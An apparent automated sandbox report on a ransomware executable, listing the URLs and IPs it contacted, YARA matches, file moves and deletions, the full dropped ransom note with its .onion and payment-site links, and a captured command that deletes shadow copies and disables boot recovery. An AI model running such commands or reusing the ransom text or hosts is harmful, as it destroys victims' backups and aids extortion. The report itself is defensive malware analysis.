            Source: myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com/~
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.almamidwifery.com:443/content/assets/jlbaveucagau.pngabulanov.comabulanov.com
            Source: myfile.exe, 00000000.00000003.2493549290.0000000005B3E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2589261774.0000000002BB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.altitudetrampolinepark.com/
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/#website
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/?s=
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/feed/
            Source: myfile.exe, 00000000.00000003.2839682725.000000000103D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/wp-json/
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bundan.com/xmlrpc.php
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/css/screen.css
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/favicon.ico
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/img/icons/og-image.jpg
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chainofhopeeurope.eu/wp-content/themes/lcde-single/js/libs/modernizr.min.js
            Source: myfile.exe, 00000000.00000003.2600172847.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chainofhopeeurope.eu/wp-json/
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg
            Source: myfile.exe, 00000000.00000002.2894114349.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpgLocationETagAuthentication-InfoAgeAccep
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostaletdelsindians.es/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=6.0.9
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostaletdelsindians.es/wp-includes/css/dist/block-library/style.min.css?ver=6.0.9
            Source: myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hostaletdelsindians.es:443/news/temp/wpuatzictpgv.jpge0
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/#/schema/logo/image/
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/#organization
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/#website
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/0E
            Source: myfile.exe, 00000000.00000003.2503875458.0000000001071000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/9E
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/?s=
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/comments/feed/
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/feed/
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/static/tmp/vd.gif
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/static/tmp/vd.gifH
            Source: myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/static/tmp/vd.gifJd
            Source: myfile.exe, 00000000.00000003.2503875458.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000000FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/static/tmp/vd.gifLMEMH
            Source: myfile.exe, 00000000.00000003.2503677440.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/static/tmp/vd.gifLocationETagAuthentication-InfoAgeAccept-RangesLast-Modified
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/wp-content/uploads/2018/08/lexced-banca-dati-giuridica.jpg
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.lexced.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif-content/game/doiathwnvkwf.gif
            Source: myfile.exe, 00000000.00000003.2839682725.0000000001051000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gifLocationETagAuthentication-InfoAgeAccep
            Source: myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/wp-json/
            Source: myfile.exe, 00000000.00000003.2839610274.0000000005B25000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mieleshopping.it/xmlrpc.php
            Source: myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/pluE
            Source: myfile.exe, 00000000.00000003.2627571814.0000000005B23000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839682725.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2382483791.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001003000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001043000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 35.215.83.253:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 160.153.0.131:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.58.213.84:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.108.65.79:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 217.160.0.18:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.40.30.106:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 138.201.61.68:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 89.116.147.189:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 208.73.140.70:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.71.217:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.26.0.120:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 87.118.122.41:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 51.15.159.75:443 -> 192.168.2.4:49752 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 160.153.0.174:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.130.22.108:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.158.62:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 134.209.129.254:443 -> 192.168.2.4:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.215.137.200:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 85.92.72.56:443 -> 192.168.2.4:49761 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 85.10.140.71:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.246.227.29:443 -> 192.168.2.4:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.68.16.21:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49766 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 141.95.251.157:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.166.193:443 -> 192.168.2.4:49770 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 109.237.132.56:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 80.158.2.41:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 35.214.211.239:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49774 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.15.78.186:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.4:49776 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 95.215.226.251:443 -> 192.168.2.4:49778 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Source: C:\Users\user\Pictures\Camera Roll\g165067x37-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion g165067x37.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] How to get access on website? [+]You have two ways:1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC0100612) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/1A63B2FBDC010061Warning: secondary website can be blocked, thats why first variant mJump to dropped file
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: myfile.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: myfile.exe PID: 7156, type: MEMORYSTR
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002739B0 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_002739B0
            Source: myfile.exe, 00000000.00000003.2329277813.0000000002A51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresAEAC:\Windows\System32\cmd.
            Source: myfile.exe, 00000000.00000003.1934915360.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.2589188241.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.2155301553.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.1942076208.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.1980534561.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000003.2027755663.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory : All of your files are encrypted!
            Source: C:\Users\user\Desktop\myfile.exeFile moved: C:\Users\user\Desktop\DTBZGIOOSO\KATAXZVCPS.mp3Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile deleted: C:\Users\user\Desktop\DTBZGIOOSO\KATAXZVCPS.mp3Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile moved: C:\Users\user\Desktop\DVWHKMNFNN.jpgJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile deleted: C:\Users\user\Desktop\DVWHKMNFNN.jpgJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pngJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Pictures\Camera Roll\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Documents\NIKHQAIQAU\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Pictures\Saved Pictures\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
